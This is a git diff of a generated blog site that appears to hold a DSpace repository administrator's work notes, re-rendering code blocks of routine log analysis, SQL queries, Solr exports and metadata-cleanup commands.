style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> @@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics <li>I experimented with manually sharding the Solr statistics on DSpace Test</li> <li>First I exported all the 2019 stats from CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid -$ zstd statistics-2019.json -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> @@ -101,15 +101,15 @@ $ zstd statistics-2019.json <ul> <li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; -$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt -$ ./ilri/ror-lookup.py -i 
/tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili -ations-matching.csv -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l -1879 -$ wc -l /tmp/2021-10-01-affiliations.txt -7100 /tmp/2021-10-01-affiliations.txt -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> <li>So we have 1879/7100 (26.46%) matching already</li> </ul> @@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Update Docker images on AReS server (linode20) and reboot the server:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code 
class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> <li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> </ul> @@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; -COPY 20994 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to 
/tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> @@ -271,17 +271,17 @@ COPY 20994 <li>I had a call with CodeObia to discuss the work on OpenRXV</li> <li>Check the results of the AReS harvesting from last night:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> -{ - &#34;count&#34; : 100875, - &#34;_shards&#34; : { - &#34;total&#34; : 1, - &#34;successful&#34; : 1, - &#34;skipped&#34; : 0, - &#34;failed&#34; : 0 - } -} -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> @@ -599,17 +599,17 @@ COPY 20994 </ul> </li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz 
| grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 1277694 </code></pre><ul> <li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> <li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot; +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; 106781 </code></pre> @@ -620,7 +620,7 @@ COPY 20994 Tue, 01 Oct 2019 13:20:51 +0300 https://alanorth.github.io/cgspace-notes/2019-10/ - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc. 
+ 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. @@ -634,7 +634,7 @@ COPY 20994 <li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> <li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -645,7 +645,7 @@ COPY 20994 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -761,16 +761,16 @@ DELETE 1 </ul> </li> </ul> -<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk 
'{print $9}' | sort | uniq -c | sort -n | tail -n 5 +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 4432 200 </code></pre><ul> <li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> <li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d </code></pre> @@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week 
from 250% to 275%—I might need to increase it again!</li> <li>The top IPs before, during, and after this latest alert tonight were:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 245 207.46.13.5 332 54.70.40.11 385 5.143.231.38 @@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> <li>There were just over 3 million accesses in the nginx logs last month:</li> </ul> -<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot; +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; 3018243 real 0m19.873s @@ -844,7 +844,7 @@ sys 0m1.979s <li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> <li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 92 40.77.167.4 99 210.7.29.100 120 38.126.157.45 @@ -979,7 +979,7 @@ sys 0m1.979s <li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a 
href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> <li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n </code></pre><ul> <li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> <li>Time to index ~70,000 items on CGSpace:</li> @@ -1073,11 +1073,11 @@ sys 2m7.289s <li>I notice this error quite a few times in dspace.log:</li> </ul> <pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. 
</code></pre><ul> <li>And there are many of these errors every day for the past month:</li> </ul> -<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.* +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34 <ul> <li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> </ul> -<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log 0 </code></pre><ul> <li>Generate list of authors on CGSpace for Peter to go through and correct:</li> </ul> -<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; COPY 54701 </code></pre> @@ -1289,7 +1289,7 @@ COPY 54701 <li>Remove redundant/duplicate text in the DSpace submission license</li> <li>Testing the CMYK patch on a collection with 650 items:</li> </ul> -<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt 
</code></pre> @@ -1330,7 +1330,7 @@ COPY 54701 <ul> <li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> </ul> -<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278'; +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; id | collection_id | item_id -------+---------------+--------- 92551 | 313 | 80278 @@ -1370,11 +1370,11 @@ DELETE 1 <li>CGSpace was down for five hours in the morning while I was sleeping</li> <li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> </ul> -<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN 
com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, 
TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) </code></pre><ul> <li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> <li>I&rsquo;ve raised a ticket with Atmire to ask</li> @@ -1429,7 +1429,7 @@ DELETE 1 <li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> <li>It looks like we might be able to use OUs now, instead of DCs:</li> </ul> -<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot; +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; </code></pre> @@ -1465,9 +1465,9 @@ $ git rebase -i dspace-5.5 <li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a 
href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> <li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> </ul> -<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; UPDATE 95 -dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; text_value ------------ (0 rows) @@ -1505,7 +1505,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>I have blocked access to the API now</li> <li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> </ul> -<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l 3168 </code></pre> @@ -1603,7 +1603,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>Looks like DSpace exhausted its PostgreSQL connection pool</li> <li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> </ul> -<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace 78 </code></pre> diff --git a/docs/posts/page/2/index.html b/docs/posts/page/2/index.html index 0a4435a34..a38268cf6 100644 --- a/docs/posts/page/2/index.html 
+++ b/docs/posts/page/2/index.html @@ -10,14 +10,14 @@ - + - + @@ -221,17 +221,17 @@
 • I had a call with CodeObia to discuss the work on OpenRXV
 • Check the results of the AReS harvesting from last night:
-$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
-{
-  "count" : 100875,
-  "_shards" : {
-    "total" : 1,
-    "successful" : 1,
-    "skipped" : 0,
-    "failed" : 0
-  }
-}
-
+$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                                                                                                                +
Read more →
diff --git a/docs/posts/page/3/index.html b/docs/posts/page/3/index.html
index de5efc9b7..93c1f4f9d 100644
--- a/docs/posts/page/3/index.html
+++ b/docs/posts/page/3/index.html
@@ -10,14 +10,14 @@
-
+
-
+
diff --git a/docs/posts/page/4/index.html b/docs/posts/page/4/index.html
index 3b8737b61..7722ccf4b 100644
--- a/docs/posts/page/4/index.html
+++ b/docs/posts/page/4/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -113,17 +113,17 @@
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                             4671942
                                                                                                                                                                                                                                                                                                                                                                                            -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                            +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                             1277694
                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                            • So 4.6 million from XMLUI and another 1.2 million from API requests
                                                                                                                                                                                                                                                                                                                                                                                            • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                             1183456 
                                                                                                                                                                                                                                                                                                                                                                                            -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
